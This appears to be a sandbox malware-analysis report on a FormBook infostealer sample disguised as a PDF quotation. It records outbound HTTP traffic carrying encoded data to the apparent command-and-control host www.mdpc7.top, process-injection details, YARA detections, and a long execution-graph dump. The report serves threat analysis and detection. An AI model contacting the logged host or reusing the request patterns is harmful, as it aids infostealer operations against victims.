                                                                  Source IP: 192.168.2.7
                                                                  Source Port: 53179
                                                                  Destination IP: 20.2.36.112
                                                                  Destination Port: 80
                                                                  PID: 3736
                                                                  Process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp: Nov 18, 2024 13:14:52.689707994 CET
                                                                  Bytes transferred: 1828
                                                                  Direction: OUT
                                                                  Data: POST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Timestamp: Nov 18, 2024 13:14:53.614986897 CET
                                                                  Bytes transferred: 336
                                                                  Direction: IN
                                                                  Data: HTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:53 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session ID: 32
                                                                  Source IP: 192.168.2.7
                                                                  Source Port: 53180
                                                                  Destination IP: 20.2.36.112
                                                                  Destination Port: 80
                                                                  PID: 3736
                                                                  Process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp: Nov 18, 2024 13:14:55.238636017 CET
                                                                  Bytes transferred: 538
                                                                  Direction: OUT
                                                                  Data: GET /55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.mdpc7.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Timestamp: Nov 18, 2024 13:14:56.188889027 CET
                                                                  Bytes transferred: 336
                                                                  Direction: IN
                                                                  Data: HTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:56 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>



                                                                  Target ID:2
                                                                  Start time:07:11:54
                                                                  Start date:18/11/2024
                                                                  Path:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                                                                  Imagebase:0x400000
                                                                  File size:970'257 bytes
                                                                  MD5 hash:8A44B6F23CEBA13203E4DC3FB33AEA3C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:07:11:56
                                                                  Start date:18/11/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                                                                  Imagebase:0xbf0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:09:10:56
                                                                  Start date:18/11/2024
                                                                  Path:C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe"
                                                                  Imagebase:0xe0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

Target ID:11
Start time:09:10:58
Start date:18/11/2024
Path:C:\Windows\SysWOW64\RMActivate_isv.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\RMActivate_isv.exe"
Imagebase:0xaf0000
File size:558'080 bytes
MD5 hash:CB999CC05F196DCF7300A5D534B3BE7B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false

Target ID:12
Start time:09:11:12
Start date:18/11/2024
Path:C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe"
Imagebase:0xe0000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

Target ID:16
Start time:09:11:30
Start date:18/11/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff722870000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Execution Graph

Execution Coverage:3.9%
Dynamic/Decrypted Code Coverage:1.4%
Signature Coverage:7.6%
Total number of Nodes:2000
Total number of Limit Nodes:37

[execution_graph: interactive call-graph data (node IDs, function addresses, API names and edges) rendered by the report viewer; the raw graph serialization is not reproduced here]
87478 431e58 87112->87478 87423 452ac7 87113->87423 87120 40e710 53 API calls 87119->87120 87121 46f9ba 87120->87121 87122 4115d7 52 API calls 87121->87122 87130 46fa26 87121->87130 87123 46f9d3 87122->87123 87124 46f9df 87123->87124 88160 40da60 53 API calls 87123->88160 87127 4533eb 85 API calls 87124->87127 87125 46fa38 87125->87052 87129 46f9f0 87127->87129 88161 40de40 87129->88161 87130->87125 87135 46fa7a 87130->87135 88146 44c285 87130->88146 87132 46fb17 87137 40bc70 52 API calls 87132->87137 87133 46fa99 87136 4115d7 52 API calls 87133->87136 87135->87132 87135->87133 87139 46fa9f 87136->87139 87140 46fb20 87137->87140 87138 46fa01 87141 46fa0b 87138->87141 88173 44ae3e CloseHandle ctype 87138->88173 87143 46fab6 87139->87143 88174 443ee5 ReadFile SetFilePointerEx 87139->88174 88149 46ea94 87140->88149 87141->87052 87153 46faba ctype 87143->87153 88175 453132 53 API calls __recalloc 87143->88175 87147 46fb30 87147->87153 88176 40e6a0 53 API calls 87147->88176 87148 46faea _memmove 87152 403cd0 VariantClear 87148->87152 87150 46fb52 87151 403cd0 VariantClear 87150->87151 87151->87153 87152->87153 87154 46fb99 87153->87154 88177 40da20 87153->88177 87154->87052 87156 46fb8b 88181 44ae3e CloseHandle ctype 87156->88181 87159 45340c 85 API calls 87158->87159 87160 481438 87159->87160 88312 402880 87160->88312 87162 48143f 87163 481465 87162->87163 87164 40a780 261 API calls 87162->87164 87165 40e710 53 API calls 87163->87165 87166 481469 87163->87166 87164->87163 87167 4814a4 87165->87167 87166->87052 87167->87052 87169 475077 128 API calls 87168->87169 87170 4755c0 87169->87170 87170->87052 87172 4678bb 87171->87172 87174 45340c 85 API calls 87172->87174 87200 467954 87172->87200 87173 4115d7 52 API calls 87175 467989 87173->87175 87176 4678f6 87174->87176 87177 467995 87175->87177 88369 40da60 53 API calls 87175->88369 87178 413a0e __wsplitpath 46 API calls 87176->87178 87180 4533eb 85 API calls 87177->87180 87181 4678fc 87178->87181 87182 4679b7 
87180->87182 87183 401b10 52 API calls 87181->87183 87184 40de40 60 API calls 87182->87184 87185 46790c 87183->87185 87186 4679c3 87184->87186 88367 40d200 52 API calls 2 library calls 87185->88367 87188 4679c7 GetLastError 87186->87188 87189 467a05 87186->87189 87191 403cd0 VariantClear 87188->87191 87192 467a2c 87189->87192 87193 467a4b 87189->87193 87190 467917 87195 4339fa 3 API calls 87190->87195 87190->87200 87194 4679dc 87191->87194 87196 4115d7 52 API calls 87192->87196 87197 4115d7 52 API calls 87193->87197 87198 4679e6 87194->87198 88370 44ae3e CloseHandle ctype 87194->88370 87199 467928 87195->87199 87202 467a31 87196->87202 87203 467a49 87197->87203 87206 408f40 VariantClear 87198->87206 87199->87200 87205 46792f 87199->87205 87200->87173 87201 467964 87200->87201 87201->87052 88371 436299 52 API calls 2 library calls 87202->88371 87210 408f40 VariantClear 87203->87210 88368 4335cd 56 API calls 3 library calls 87205->88368 87209 4679ed 87206->87209 87209->87052 87212 467a88 87210->87212 87211 467939 87211->87200 87213 408f40 VariantClear 87211->87213 87212->87052 87214 467947 87213->87214 87214->87200 87268 4533eb 87215->87268 87218 4750ee 87220 408f40 VariantClear 87218->87220 87219 475129 87272 4646e0 87219->87272 87228 4750f5 87220->87228 87222 47515e 87223 475162 87222->87223 87248 47518e 87222->87248 87224 408f40 VariantClear 87223->87224 87246 475169 87224->87246 87225 475357 87226 475365 87225->87226 87227 4754ea 87225->87227 87352 44b3ac 57 API calls 87226->87352 87355 464812 92 API calls 87227->87355 87228->87070 87232 4754fc 87233 475374 87232->87233 87234 475508 87232->87234 87285 430d31 87233->87285 87236 408f40 VariantClear 87234->87236 87235 4533eb 85 API calls 87235->87248 87238 47550f 87236->87238 87238->87246 87239 475388 87292 4577e9 87239->87292 87242 47539e 87300 410cfc 87242->87300 87243 475480 87244 408f40 VariantClear 87243->87244 87244->87246 87246->87070 87248->87225 87248->87235 87248->87243 87254 4754b5 87248->87254 87350 
436299 52 API calls 2 library calls 87248->87350 87351 463ad5 64 API calls __wcsicoll 87248->87351 87249 4753d4 87251 40e830 53 API calls 87249->87251 87250 4753b8 87353 45e737 90 API calls 3 library calls 87250->87353 87255 4753e3 87251->87255 87253 4753c5 GetCurrentProcess TerminateProcess 87253->87249 87256 408f40 VariantClear 87254->87256 87257 40cf00 53 API calls 87255->87257 87266 475406 87255->87266 87256->87246 87258 4753f8 87257->87258 87259 46c43e 106 API calls 87258->87259 87259->87266 87261 475556 87261->87246 87262 47556e FreeLibrary 87261->87262 87262->87246 87266->87261 87267 408f40 VariantClear 87266->87267 87304 40cf00 87266->87304 87317 46c43e 87266->87317 87354 408e80 VariantClear 87266->87354 87356 44b3ac 57 API calls 87266->87356 87267->87266 87269 453404 87268->87269 87270 4533f8 87268->87270 87269->87218 87269->87219 87270->87269 87357 4531b1 85 API calls 5 library calls 87270->87357 87358 4536f7 53 API calls 87272->87358 87274 4646fc 87359 4426cd 59 API calls _wcslen 87274->87359 87276 464711 87278 40bc70 52 API calls 87276->87278 87284 46474b 87276->87284 87279 46472c 87278->87279 87360 461465 52 API calls _memmove 87279->87360 87281 464741 87283 40c600 52 API calls 87281->87283 87282 464793 87282->87222 87283->87284 87284->87282 87361 463ad5 64 API calls __wcsicoll 87284->87361 87286 430db2 87285->87286 87287 430d54 87285->87287 87286->87239 87288 4115d7 52 API calls 87287->87288 87291 430d74 87288->87291 87289 430da9 87289->87239 87290 4115d7 52 API calls 87290->87291 87291->87289 87291->87290 87293 457a84 87292->87293 87299 45780c _strcat _wcslen _wcscpy ctype 87292->87299 87293->87242 87294 45340c 85 API calls 87294->87299 87295 443006 57 API calls 87295->87299 87297 4135bb 46 API calls _malloc 87297->87299 87299->87293 87299->87294 87299->87295 87299->87297 87362 40f6f0 87299->87362 87370 44b3ac 57 API calls 87299->87370 87302 410d11 87300->87302 87301 410da9 VirtualProtect 87303 410d77 87301->87303 87302->87301 87302->87303 
87303->87249 87303->87250 87305 428ac6 87304->87305 87306 40cf0e 87304->87306 87305->87266 87307 40cf19 87306->87307 87371 40e810 52 API calls 87306->87371 87310 40cf1d 87307->87310 87373 40e950 53 API calls 87307->87373 87311 40cf38 87310->87311 87312 4115d7 52 API calls 87310->87312 87311->87266 87313 40cf88 87312->87313 87314 40cfaa 87313->87314 87372 40d290 52 API calls 87313->87372 87314->87266 87316 40cf96 87316->87266 87318 46c459 87317->87318 87349 46c477 ctype 87317->87349 87320 46c507 87318->87320 87321 46c567 87318->87321 87322 46c4c5 87318->87322 87323 46c585 87318->87323 87324 46c460 87318->87324 87325 46c4ab 87318->87325 87326 46c488 87318->87326 87327 46c549 87318->87327 87328 46c496 87318->87328 87329 46c537 87318->87329 87330 46c4f1 87318->87330 87331 46c51f 87318->87331 87332 46c4db 87318->87332 87319 46c5ab 87319->87266 87342 408f40 VariantClear 87320->87342 87333 408f40 VariantClear 87321->87333 87339 408f40 VariantClear 87322->87339 87392 468070 104 API calls ctype 87323->87392 87380 43299a 54 API calls _strlen 87324->87380 87338 408f40 VariantClear 87325->87338 87334 40e710 53 API calls 87326->87334 87346 408f40 VariantClear 87327->87346 87336 408f40 VariantClear 87328->87336 87344 408f40 VariantClear 87329->87344 87341 408f40 VariantClear 87330->87341 87343 408f40 VariantClear 87331->87343 87340 408f40 VariantClear 87332->87340 87333->87349 87334->87349 87336->87349 87338->87349 87339->87349 87340->87349 87341->87349 87342->87349 87343->87349 87344->87349 87346->87349 87347 46c46a 87381 40e710 87347->87381 87349->87319 87374 413748 87349->87374 87350->87248 87351->87248 87352->87233 87353->87253 87354->87266 87355->87232 87356->87266 87357->87269 87358->87274 87359->87276 87360->87281 87361->87282 87363 425de2 87362->87363 87365 40f6fc _wcslen 87362->87365 87363->87299 87364 40f710 WideCharToMultiByte 87366 40f756 87364->87366 87367 40f728 87364->87367 87365->87364 87366->87299 87368 4115d7 52 API calls 87367->87368 87369 40f735 
WideCharToMultiByte 87368->87369 87369->87299 87370->87299 87371->87307 87372->87316 87373->87310 87375 413753 RtlFreeHeap 87374->87375 87379 41377c __dosmaperr 87374->87379 87376 413768 87375->87376 87375->87379 87393 417f77 46 API calls __getptd_noexit 87376->87393 87378 41376e GetLastError 87378->87379 87379->87319 87380->87347 87382 408f40 VariantClear 87381->87382 87383 40e71b 87382->87383 87384 4115d7 52 API calls 87383->87384 87385 40e729 87384->87385 87386 40e734 87385->87386 87387 426bdc 87385->87387 87388 426be7 87386->87388 87389 401b10 52 API calls 87386->87389 87387->87388 87390 40bc70 52 API calls 87387->87390 87391 40e743 87389->87391 87390->87388 87391->87349 87392->87349 87393->87378 87395 40f6f0 54 API calls 87394->87395 87396 40f77b _strcat ctype 87395->87396 87482 40f850 87396->87482 87401 427c2a 87511 414d04 87401->87511 87403 40f7fc 87403->87401 87405 40f804 87403->87405 87498 414a46 87405->87498 87409 40f80e 87409->87081 87409->87082 87410 427c59 87517 414fe2 87410->87517 87412 427c79 87414 433791 _wcschr __write_nolock 87413->87414 87415 4337a8 _wcscpy 87414->87415 87416 413a0e __wsplitpath 46 API calls 87414->87416 87415->87106 87417 4337dd 87416->87417 87418 413a0e __wsplitpath 46 API calls 87417->87418 87419 4337ff _wcscat _wcscpy 87418->87419 87419->87106 87922 4339b6 GetFileAttributesW 87420->87922 87422 433a06 87422->87109 87422->87111 87424 452ad7 __write_nolock 87423->87424 87425 442c5a GetSystemTimeAsFileTime 87424->87425 87426 452b2b 87425->87426 87427 4150d1 _fseek 81 API calls 87426->87427 87428 452b40 87427->87428 87429 452c30 87428->87429 87430 452b59 87428->87430 87927 452719 87429->87927 87431 452719 90 API calls 87430->87431 87476->87097 87477->87104 87479 431e64 87478->87479 87480 431e6a 87478->87480 87481 414a46 __fcloseall 82 API calls 87479->87481 87480->87052 87481->87480 87484 40f85d __recalloc _strlen 87482->87484 87485 40f7ab 87484->87485 87530 414db8 87484->87530 87486 4149c2 87485->87486 87545 414904 87486->87545 
87488 40f7e9 87488->87401 87489 40f5c0 87488->87489 87494 40f5cd _strcat __write_nolock _memmove 87489->87494 87490 414d04 __fread_nolock 61 API calls 87490->87494 87492 425d11 87493 4150d1 _fseek 81 API calls 87492->87493 87495 425d33 87493->87495 87494->87490 87494->87492 87497 40f691 __tzset_nolock 87494->87497 87661 4150d1 87494->87661 87496 414d04 __fread_nolock 61 API calls 87495->87496 87496->87497 87497->87403 87499 414a52 ___lock_fhandle 87498->87499 87500 414a64 87499->87500 87501 414a79 87499->87501 87767 417f77 46 API calls __getptd_noexit 87500->87767 87504 415471 __lock_file 47 API calls 87501->87504 87506 414a74 ___lock_fhandle 87501->87506 87503 414a69 87768 417f25 10 API calls __wcsicoll 87503->87768 87507 414a92 87504->87507 87506->87409 87751 4149d9 87507->87751 87831 414c76 87511->87831 87513 414d1c 87514 44afef 87513->87514 87915 442c5a 87514->87915 87516 44b00d 87516->87410 87518 414fee ___lock_fhandle 87517->87518 87519 414ffa 87518->87519 87520 41500f 87518->87520 87919 417f77 46 API calls __getptd_noexit 87519->87919 87522 415471 __lock_file 47 API calls 87520->87522 87524 415017 87522->87524 87523 414fff 87920 417f25 10 API calls __wcsicoll 87523->87920 87526 414e4e __ftell_nolock 51 API calls 87524->87526 87527 415024 87526->87527 87921 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87527->87921 87529 41500a ___lock_fhandle 87529->87412 87531 414dd6 87530->87531 87532 414deb 87530->87532 87541 417f77 46 API calls __getptd_noexit 87531->87541 87532->87531 87534 414df2 87532->87534 87543 41b91b 79 API calls 11 library calls 87534->87543 87535 414ddb 87542 417f25 10 API calls __wcsicoll 87535->87542 87538 414e18 87539 414de6 87538->87539 87544 418f98 77 API calls 5 library calls 87538->87544 87539->87484 87541->87535 87542->87539 87543->87538 87544->87539 87547 414910 ___lock_fhandle 87545->87547 87546 414923 87601 417f77 46 API calls __getptd_noexit 87546->87601 87547->87546 87550 414951 87547->87550 87549 414928 87602 417f25 10 
API calls __wcsicoll 87549->87602 87564 41d4d1 87550->87564 87553 414956 87554 41496a 87553->87554 87555 41495d 87553->87555 87557 414992 87554->87557 87558 414972 87554->87558 87603 417f77 46 API calls __getptd_noexit 87555->87603 87581 41d218 87557->87581 87604 417f77 46 API calls __getptd_noexit 87558->87604 87560 414933 ___lock_fhandle @_EH4_CallFilterFunc@8 87560->87488 87565 41d4dd ___lock_fhandle 87564->87565 87606 4182cb 87565->87606 87567 41d560 87613 41d5fb 87567->87613 87568 41d567 87645 416b04 87568->87645 87571 41d5f0 ___lock_fhandle 87571->87553 87573 41d57c InitializeCriticalSectionAndSpinCount 87576 41d59c 87573->87576 87577 41d5af EnterCriticalSection 87573->87577 87578 413748 _free 46 API calls 87576->87578 87577->87567 87578->87567 87579 41d4eb 87579->87567 87579->87568 87616 418209 87579->87616 87643 4154b2 47 API calls __lock 87579->87643 87644 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87579->87644 87582 41d23a 87581->87582 87583 41d255 87582->87583 87595 41d26c __wopenfile 87582->87595 87654 417f77 46 API calls __getptd_noexit 87583->87654 87585 41d25a 87655 417f25 10 API calls __wcsicoll 87585->87655 87586 41d421 87588 41d47a 87586->87588 87589 41d48c 87586->87589 87659 417f77 46 API calls __getptd_noexit 87588->87659 87651 422bf9 87589->87651 87592 41499d 87605 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87592->87605 87593 41d47f 87660 417f25 10 API calls __wcsicoll 87593->87660 87595->87586 87595->87588 87595->87595 87656 41341f 58 API calls 2 library calls 87595->87656 87597 41d41a 87597->87586 87657 41341f 58 API calls 2 library calls 87597->87657 87599 41d439 87599->87586 87658 41341f 58 API calls 2 library calls 87599->87658 87601->87549 87602->87560 87603->87560 87604->87560 87605->87560 87607 4182e0 87606->87607 87608 4182f3 EnterCriticalSection 87606->87608 87609 418209 __mtinitlocknum 45 API calls 87607->87609 87608->87579 87610 4182e6 87609->87610 87610->87608 87611 411924 __amsg_exit 45 API calls 
87610->87611 87612 4182f2 87611->87612 87612->87608 87614 4181f2 _doexit LeaveCriticalSection 87613->87614 87615 41d602 87614->87615 87615->87571 87617 418215 ___lock_fhandle 87616->87617 87618 418225 87617->87618 87619 41823d 87617->87619 87620 418901 __FF_MSGBANNER 45 API calls 87618->87620 87621 416b04 __malloc_crt 45 API calls 87619->87621 87627 41824b ___lock_fhandle 87619->87627 87622 41822a 87620->87622 87623 418256 87621->87623 87624 418752 __NMSG_WRITE 45 API calls 87622->87624 87625 41825d 87623->87625 87626 41826c 87623->87626 87628 418231 87624->87628 87630 417f77 __wcsicoll 45 API calls 87625->87630 87631 4182cb __lock 45 API calls 87626->87631 87627->87579 87629 411682 _fast_error_exit GetModuleHandleW GetProcAddress ExitProcess 87628->87629 87632 41823b 87629->87632 87630->87627 87633 418273 87631->87633 87632->87619 87634 4182a6 87633->87634 87635 41827b InitializeCriticalSectionAndSpinCount 87633->87635 87636 413748 _free 45 API calls 87634->87636 87637 418297 87635->87637 87638 41828b 87635->87638 87636->87637 87641 4182c2 __mtinitlocknum LeaveCriticalSection 87637->87641 87639 413748 _free 45 API calls 87638->87639 87640 418291 87639->87640 87642 417f77 __wcsicoll 45 API calls 87640->87642 87641->87627 87642->87637 87643->87579 87644->87579 87648 416b0d 87645->87648 87646 4135bb _malloc 45 API calls 87646->87648 87647 416b43 87647->87567 87647->87573 87648->87646 87648->87647 87649 416b24 Sleep 87648->87649 87650 416b39 87649->87650 87650->87647 87650->87648 87652 422b35 __wsopen_helper 109 API calls 87651->87652 87653 422c14 87652->87653 87653->87592 87654->87585 87655->87592 87656->87597 87657->87599 87658->87586 87659->87593 87660->87592 87664 4150dd ___lock_fhandle 87661->87664 87662 4150e9 87692 417f77 46 API calls __getptd_noexit 87662->87692 87664->87662 87665 41510f 87664->87665 87674 415471 87665->87674 87666 4150ee 87693 417f25 10 API calls __wcsicoll 87666->87693 87672 4150f9 ___lock_fhandle 87672->87494 87675 415483 87674->87675 87676 
4154a5 EnterCriticalSection 87674->87676 87675->87676 87677 41548b 87675->87677 87678 415117 87676->87678 87679 4182cb __lock 46 API calls 87677->87679 87680 415047 87678->87680 87679->87678 87681 415067 87680->87681 87682 415057 87680->87682 87687 415079 87681->87687 87695 414e4e 87681->87695 87750 417f77 46 API calls __getptd_noexit 87682->87750 87686 41505c 87694 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87686->87694 87712 41443c 87687->87712 87690 4150b9 87725 41e1f4 87690->87725 87692->87666 87693->87672 87694->87672 87696 414e61 87695->87696 87697 414e79 87695->87697 87699 417f77 __wcsicoll 46 API calls 87696->87699 87698 414139 __flswbuf 46 API calls 87697->87698 87700 414e80 87698->87700 87701 414e66 87699->87701 87703 41e1f4 __write 51 API calls 87700->87703 87702 417f25 __wcsicoll 10 API calls 87701->87702 87711 414e71 87702->87711 87704 414e97 87703->87704 87705 414f09 87704->87705 87707 414ec9 87704->87707 87704->87711 87706 417f77 __wcsicoll 46 API calls 87705->87706 87706->87711 87708 41e1f4 __write 51 API calls 87707->87708 87707->87711 87709 414f64 87708->87709 87710 41e1f4 __write 51 API calls 87709->87710 87709->87711 87710->87711 87711->87687 87713 414455 87712->87713 87717 414477 87712->87717 87714 414139 __flswbuf 46 API calls 87713->87714 87713->87717 87715 414470 87714->87715 87716 41b7b2 __write 77 API calls 87715->87716 87716->87717 87718 414139 87717->87718 87719 414145 87718->87719 87720 41415a 87718->87720 87721 417f77 __wcsicoll 46 API calls 87719->87721 87720->87690 87722 41414a 87721->87722 87723 417f25 __wcsicoll 10 API calls 87722->87723 87724 414155 87723->87724 87724->87690 87726 41e200 ___lock_fhandle 87725->87726 87727 41e223 87726->87727 87728 41e208 87726->87728 87730 41e22f 87727->87730 87735 41e269 87727->87735 87729 417f8a __write_nolock 46 API calls 87728->87729 87731 41e20d 87729->87731 87732 417f8a __write_nolock 46 API calls 87730->87732 87733 417f77 __wcsicoll 46 API calls 87731->87733 87734 41e234 
87732->87734 87745 41e215 ___lock_fhandle 87733->87745 87737 417f77 __wcsicoll 46 API calls 87734->87737 87736 41ae56 ___lock_fhandle 48 API calls 87735->87736 87738 41e26f 87736->87738 87739 41e23c 87737->87739 87740 41e291 87738->87740 87741 41e27d 87738->87741 87742 417f25 __wcsicoll 10 API calls 87739->87742 87744 417f77 __wcsicoll 46 API calls 87740->87744 87743 41e17f __lseek_nolock 48 API calls 87741->87743 87742->87745 87746 41e289 87743->87746 87747 41e296 87744->87747 87745->87686 87749 41e2c0 __write LeaveCriticalSection 87746->87749 87748 417f8a __write_nolock 46 API calls 87747->87748 87748->87746 87749->87745 87750->87686 87752 4149ea 87751->87752 87753 4149fe 87751->87753 87797 417f77 46 API calls __getptd_noexit 87752->87797 87756 4149fa 87753->87756 87757 41443c __flush 77 API calls 87753->87757 87755 4149ef 87798 417f25 10 API calls __wcsicoll 87755->87798 87769 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87756->87769 87758 414a0a 87757->87758 87770 41d8c2 87758->87770 87762 414139 __flswbuf 46 API calls 87763 414a18 87762->87763 87774 41d7fe 87763->87774 87765 414a1e 87765->87756 87766 413748 _free 46 API calls 87765->87766 87766->87756 87767->87503 87768->87506 87769->87506 87771 414a12 87770->87771 87772 41d8d2 87770->87772 87771->87762 87772->87771 87773 413748 _free 46 API calls 87772->87773 87773->87771 87775 41d80a ___lock_fhandle 87774->87775 87776 41d812 87775->87776 87777 41d82d 87775->87777 87824 417f8a 46 API calls __getptd_noexit 87776->87824 87778 41d839 87777->87778 87783 41d873 87777->87783 87826 417f8a 46 API calls __getptd_noexit 87778->87826 87781 41d817 87825 417f77 46 API calls __getptd_noexit 87781->87825 87782 41d83e 87827 417f77 46 API calls __getptd_noexit 87782->87827 87799 41ae56 87783->87799 87787 41d81f ___lock_fhandle 87787->87765 87788 41d846 87828 417f25 10 API calls __wcsicoll 87788->87828 87789 41d879 87791 41d893 87789->87791 87792 41d887 87789->87792 87829 417f77 46 API calls __getptd_noexit 
